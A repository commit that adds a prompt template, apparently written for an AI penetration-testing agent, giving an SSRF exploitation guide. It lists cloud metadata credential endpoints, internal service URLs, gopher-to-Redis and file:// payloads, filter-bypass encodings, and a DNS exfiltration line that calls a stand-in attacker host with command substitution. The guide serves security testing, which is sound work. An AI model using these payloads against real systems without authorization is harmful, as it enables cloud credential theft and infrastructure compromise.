Open-source release for Alpha version
This commit is contained in:
Ahmed Allam
168
strix/prompts/vulnerabilities/ssrf.jinja
Normal file
168
strix/prompts/vulnerabilities/ssrf.jinja
Normal file
@@ -0,0 +1,168 @@
|
||||
<ssrf_vulnerability_guide>
|
||||
<title>SERVER-SIDE REQUEST FORGERY (SSRF) - ADVANCED EXPLOITATION</title>
|
||||
|
||||
<critical>SSRF can lead to internal network access, cloud metadata theft, and complete infrastructure compromise.</critical>
|
||||
|
||||
<common_injection_points>
|
||||
- URL parameters: url=, link=, path=, src=, href=, uri=
|
||||
- File import/export features
|
||||
- Webhooks and callbacks
|
||||
- PDF generators (wkhtmltopdf)
|
||||
- Image processing (ImageMagick)
|
||||
- Document parsers
|
||||
- Payment gateways (IPN callbacks)
|
||||
- Social media card generators
|
||||
- URL shorteners/expanders
|
||||
</common_injection_points>
|
||||
|
||||
<hidden_contexts>
|
||||
- Referer headers in analytics
|
||||
- Link preview generation
|
||||
- RSS/Feed fetchers
|
||||
- Repository cloning (Git/SVN)
|
||||
- Package managers (npm, pip)
|
||||
- Calendar invites (ICS files)
|
||||
- OAuth redirect_uri
|
||||
- SAML endpoints
|
||||
- GraphQL field resolvers
|
||||
</hidden_contexts>
|
||||
|
||||
<cloud_metadata>
|
||||
<aws>
|
||||
Legacy: http://169.254.169.254/latest/meta-data/
|
||||
IMDSv2: Requires token but check if app proxies headers
|
||||
Key targets: /iam/security-credentials/, /user-data/
|
||||
</aws>
|
||||
|
||||
<google_cloud>
|
||||
http://metadata.google.internal/computeMetadata/v1/
|
||||
Requires: Metadata-Flavor: Google header
|
||||
Target: /instance/service-accounts/default/token
|
||||
</google_cloud>
|
||||
|
||||
<azure>
|
||||
http://169.254.169.254/metadata/instance?api-version=2021-02-01
|
||||
Requires: Metadata: true header
|
||||
OAuth: /metadata/identity/oauth2/token
|
||||
</azure>
|
||||
</cloud_metadata>
|
||||
|
||||
<internal_services>
|
||||
<port_scanning>
|
||||
Common ports: 21,22,80,443,445,1433,3306,3389,5432,6379,8080,9200,27017
|
||||
</port_scanning>
|
||||
|
||||
<service_fingerprinting>
|
||||
- Elasticsearch: http://localhost:9200/_cat/indices
|
||||
- Redis: dict://localhost:6379/INFO
|
||||
- MongoDB: http://localhost:27017/test
|
||||
- Docker: http://localhost:2375/v1.24/containers/json
|
||||
- Kubernetes: https://kubernetes.default.svc/api/v1/
|
||||
</service_fingerprinting>
|
||||
</internal_services>
|
||||
|
||||
<protocol_exploitation>
|
||||
<gopher>
|
||||
Redis RCE, SMTP injection, FastCGI exploitation
|
||||
</gopher>
|
||||
|
||||
<file>
|
||||
file:///etc/passwd, file:///proc/self/environ
|
||||
</file>
|
||||
|
||||
<dict>
|
||||
dict://localhost:11211/stat (Memcached)
|
||||
</dict>
|
||||
</protocol_exploitation>
|
||||
|
||||
<bypass_techniques>
|
||||
<dns_rebinding>
|
||||
First request → your server, second → 127.0.0.1
|
||||
</dns_rebinding>
|
||||
|
||||
<encoding_tricks>
|
||||
- Decimal IP: http://2130706433/ (127.0.0.1)
|
||||
- Octal: http://0177.0.0.1/
|
||||
- Hex: http://0x7f.0x0.0x0.0x1/
|
||||
- IPv6: http://[::1]/, http://[::ffff:127.0.0.1]/
|
||||
</encoding_tricks>
|
||||
|
||||
<url_parser_confusion>
|
||||
- Authority: http://expected@evil/
|
||||
- Unicode: http://⑯⑨。②⑤④。⑯⑨。②⑤④/
|
||||
</url_parser_confusion>
|
||||
|
||||
<redirect_chains>
|
||||
302 → yourserver.com → 169.254.169.254
|
||||
</redirect_chains>
|
||||
</bypass_techniques>
|
||||
|
||||
<advanced_techniques>
|
||||
<blind_ssrf>
|
||||
- DNS exfiltration: http://$(hostname).attacker.com/
|
||||
- Timing attacks for network mapping
|
||||
- Error-based detection
|
||||
</blind_ssrf>
|
||||
|
||||
<ssrf_to_rce>
|
||||
- Redis: gopher://localhost:6379/ (cron injection)
|
||||
- Memcached: gopher://localhost:11211/
|
||||
- FastCGI: gopher://localhost:9000/
|
||||
</ssrf_to_rce>
|
||||
</advanced_techniques>
|
||||
|
||||
<filter_bypasses>
|
||||
<localhost>
|
||||
127.1, 0177.0.0.1, 0x7f000001, 2130706433, 127.0.0.0/8, localtest.me
|
||||
</localhost>
|
||||
|
||||
<parser_differentials>
|
||||
http://evil.com#@good.com/, http:evil.com
|
||||
</parser_differentials>
|
||||
|
||||
<protocols>
|
||||
dict://, gopher://, ftp://, file://, jar://, netdoc://
|
||||
</protocols>
|
||||
</filter_bypasses>
|
||||
|
||||
<validation_techniques>
|
||||
To confirm SSRF:
|
||||
1. External callbacks (DNS/HTTP)
|
||||
2. Internal network access (different responses)
|
||||
3. Time-based detection (timeouts)
|
||||
4. Cloud metadata retrieval
|
||||
5. Protocol differentiation
|
||||
</validation_techniques>
|
||||
|
||||
<false_positive_indicators>
|
||||
NOT SSRF if:
|
||||
- Only client-side redirects
|
||||
- Whitelist properly blocking
|
||||
- Generic errors for all URLs
|
||||
- No outbound requests made
|
||||
- Same-origin policy enforced
|
||||
</false_positive_indicators>
|
||||
|
||||
<impact_demonstration>
|
||||
- Cloud credential theft (AWS/GCP/Azure)
|
||||
- Internal admin panel access
|
||||
- Port scanning results
|
||||
- SSRF to RCE chain
|
||||
- Data exfiltration
|
||||
</impact_demonstration>
|
||||
|
||||
<pro_tips>
|
||||
1. Always check cloud metadata first
|
||||
2. Chain with other vulns (SSRF + XXE)
|
||||
3. Use time delays for blind SSRF
|
||||
4. Try all protocols, not just HTTP
|
||||
5. Automate internal network scanning
|
||||
6. Check parser quirks (language-specific)
|
||||
7. Monitor DNS for blind confirmation
|
||||
8. Try IPv6 (often forgotten)
|
||||
9. Abuse redirects for filter bypass
|
||||
10. SSRF can be in any URL-fetching feature
|
||||
</pro_tips>
|
||||
|
||||
<remember>SSRF is often the key to cloud compromise. A single SSRF in cloud = complete account takeover through metadata access.</remember>
|
||||
</ssrf_vulnerability_guide>
|
||||
Reference in New Issue
Block a user